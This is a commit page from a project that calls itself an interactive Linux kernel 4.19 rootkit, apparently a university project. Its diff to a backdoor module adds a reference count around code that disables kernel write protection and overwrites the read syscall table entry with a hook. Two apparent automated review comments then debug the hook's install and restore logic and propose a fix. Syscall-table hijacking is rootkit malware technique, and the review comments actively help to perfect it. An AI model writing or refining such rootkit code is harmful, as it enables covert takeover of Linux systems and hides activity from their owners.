linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit bce882ce726e6a62df78017f4cbe87fa39f00445
parent 2696bbd0c30d0ce77be9091fa85f46129f14df50
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 29 Nov 2020 17:40:59 +0100

adds install count for read hook

Diffstat:
Msrc/backdoor.c | 28+++++++++++++++++-----------
1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -16,9 +16,11 @@ int (*current_receive_buf2)(struct tty_struct *, const unsigned char *, char *,
 void
 backdoor_read(void)
 {
- disable_protection();
- sys_calls[__NR_read] = (void *)g7_read;
- enable_protection();
+ if (atomic_inc_return(&read_install_count) == 1) {
+ disable_protection();
+ sys_calls[__NR_read] = (void *)g7_read;
+ enable_protection();
+ }
 }
 
 void
@@ -54,16 +56,20 @@ unbackdoor(void)
 tty = NULL;
 }
 
- if (sys_read) {
- disable_protection();
- sys_calls[__NR_read] = (void *)sys_read;
- enable_protection();
+ if (atomic_dec_return(&read_install_count) < 0) {
+ atomic_set(&read_install_count, 0);
+
+ if (sys_read) {
+ disable_protection();
+ sys_calls[__NR_read] = (void *)sys_read;
+ enable_protection();
 
- int cur;
+ int cur;
 
- while ((cur = atomic_read(&read_count)) > 0) {
- DEBUG_INFO("Waiting for %d tasks", cur);
- msleep(250);
+ while ((cur = atomic_read(&read_count)) > 0) {
+ DEBUG_INFO("Waiting for %d tasks", cur);
+ msleep(250);
+ }
 }
 }
 }
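Review bot: `read_install_count` is referenced on the added `if (atomic_inc_return(&read_install_count) == 1) {` line, but no declaration is part of this change — the diffstat lists only src/backdoor.c and its 17 insertions are fully accounted for by these two hunks — so presumably it is an `atomic_t` already declared in a header this commit depends on; worth confirming the build before merging. The install-on-first-caller semantics also deserve a comment at the top of backdoor_read(), because the release side in unbackdoor() has to agree with it exactly: `/* read_install_count: outstanding backdoor_read() callers; the syscall slot is swapped only on the 0 -> 1 transition and restored by unbackdoor() on the way back down. */`.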
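Review bot: The release condition `if (atomic_dec_return(&read_install_count) < 0) {` does not mirror the install condition `== 1` in backdoor_read(): after one backdoor_read() and one unbackdoor() the counter goes 1 -> 0, the branch is skipped, and `sys_calls[__NR_read]` still points at g7_read, so if the two functions are meant to pair one-to-one the original handler is only restored on an extra unbackdoor() call, and a teardown path that relies on unbackdoor() before module unload would leave the syscall slot pointing at unloaded code. If the intent is also to tolerate an unmatched unbackdoor(), `<= 0` keeps the reset-to-zero clamp and still restores on the final matched release: `if (atomic_dec_return(&read_install_count) <= 0) {`. The enclosing unbackdoor() body starts before this hunk (the tty teardown above `tty = NULL;`), so whether anything else depends on the counter going negative cannot be seen here.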